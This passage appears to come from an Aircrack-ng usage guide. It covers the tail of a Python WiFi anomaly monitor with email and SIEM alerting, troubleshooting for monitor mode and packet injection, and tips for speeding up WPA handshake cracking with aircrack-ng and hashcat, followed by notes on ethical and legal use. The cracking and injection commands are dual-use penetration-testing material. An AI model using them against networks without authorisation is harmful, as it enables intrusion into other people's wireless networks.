msg['Subject'] = f"WiFi Security Alert - {alert['type']}"
body = f"""
WiFi Security Alert
Type: {alert['type']}
Severity: {alert['severity']}
Message: {alert['message']}
Timestamp: {datetime.now().isoformat()}
Network Details:
BSSID: {alert['network']['bssid']}
ESSID: {alert['network']['essid']}
Channel: {alert['network']['channel']}
Encryption: {alert['network']['privacy']}
Power: {alert['network']['power']} dBm
This is an automated alert from the WiFi monitoring system.
"""
msg.attach(MimeText(body, 'plain'))
server = smtplib.SMTP(email_config['smtp_server'], email_config['port'])
if email_config.get('use_tls', True):
server.starttls()
if email_config.get('username'):
server.login(email_config['username'], email_config['password'])
server.send_message(msg)
server.quit()
except Exception as e:
self.logger.error(f"Failed to send email alert: {e}")
def send_siem_alert(self, alert):
"""Send alert to SIEM system"""
try:
import requests
siem_config = self.config['siem']
siem_event = {
'timestamp': datetime.now().isoformat(),
'source': 'wifi_monitor',
'event_type': alert['type'],
'severity': alert['severity'],
'message': alert['message'],
'network': alert['network']
}
response = requests.post(
siem_config['url'],
json=siem_event,
headers={'Authorization': f"Bearer {siem_config['token']}"},
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send SIEM alert: {response.status_code}")
except Exception as e:
self.logger.error(f"Error sending SIEM alert: {e}")
def run_continuous_monitoring(self):
"""Run continuous WiFi monitoring"""
self.logger.info("Starting continuous WiFi monitoring")
while True:
try:
self.logger.info("Scanning for wireless networks...")
networks = self.scan_networks()
if networks:
self.logger.info(f"Found {len(networks)} networks")
# Detect anomalies
alerts = self.detect_anomalies(networks)
# Send alerts
for alert in alerts:
self.send_alert(alert)
# Save scan results
with open('/var/log/wifi_scan_results.json', 'a') as f:
for network in networks:
f.write(json.dumps(network) + '\n')
else:
self.logger.info("No networks found")
# Wait for next scan
self.logger.info(f"Waiting {self.scan_interval} seconds for next scan...")
time.sleep(self.scan_interval)
except KeyboardInterrupt:
self.logger.info("Monitoring stopped by user")
break
except Exception as e:
self.logger.error(f"Error in monitoring loop: {e}")
time.sleep(60) # Wait before retrying
# Configuration
config = {
'interface': 'wlan0mon',
'scan_interval': 300, # 5 minutes
'email': {
'enabled': True,
'smtp_server': 'smtp.company.com',
'port': 587,
'use_tls': True,
'username': 'monitor@company.com',
'password': 'password',
'from': 'wifi-monitor@company.com',
'to': 'security@company.com'
},
'siem': {
'enabled': False,
'url': 'https://siem.company.com/api/events',
'token': 'your-api-token'
}
}
# Usage
if __name__ == "__main__":
monitor = WiFiMonitor(config)
monitor.run_continuous_monitoring()Troubleshooting
Common Issues
Monitor Mode Issues:
bash
# Check if interface supports monitor mode
iw list | grep -A 10 "Supported interface modes"
# Kill interfering processes
sudo airmon-ng check kill
# Manually set monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Check monitor mode status
iwconfig wlan0No Networks Detected:
bash
# Check interface status
iwconfig
sudo iw dev
# Verify monitor mode
iwconfig wlan0mon | grep Mode
# Check for hardware issues
dmesg | grep -i wifi
lsusb | grep -i wireless
# Try different channels
sudo iwconfig wlan0mon channel 1
sudo iwconfig wlan0mon channel 6
sudo iwconfig wlan0mon channel 11Injection Issues:
bash
# Test injection capability
sudo aireplay-ng --test wlan0mon
# Check for packet injection support
sudo aireplay-ng --test wlan1mon
# Verify driver support
lsmod | grep -i wireless
dmesg | grep -i driverPerformance Optimization
Optimizing Aircrack-ng performance:
bash
# Use multiple CPU cores for cracking
aircrack-ng -p 4 capture.cap
# Optimize airodump-ng
sudo airodump-ng --band abg wlan0mon # Scan all bands
sudo airodump-ng -M wlan0mon # Enable manufacturer lookup
# Use faster wordlists
# Create optimized wordlist
sort wordlist.txt | uniq > optimized_wordlist.txt
# Use GPU acceleration with hashcat
aircrack-ng -J hashcat_format capture.cap
hashcat -m 2500 -w 3 hashcat_format.hccapx wordlist.txtSecurity Considerations
Ethical Usage
Legal Considerations:
- Only test networks you own or have explicit permission to test
- Understand local laws regarding wireless security testing
- Obtain proper authorization before conducting assessments
- Document all testing activities for compliance purposes
- Respect privacy and confidentiality of captured data
Operational Security:
- Use Aircrack-ng in isolated test environments when possible
- Implement proper access controls for captured data
- Secure storage and transmission of sensitive information
- Regular updates of Aircrack-ng and dependencies
- Monitor for detection by wireless intrusion detection systems
Data Protection
Captured Data Security:
- Encrypt captured handshakes and traffic
- Implement secure deletion of temporary files
- Use secure channels for data transmission
- Implement data retention policies
- Regular security assessments of testing infrastructure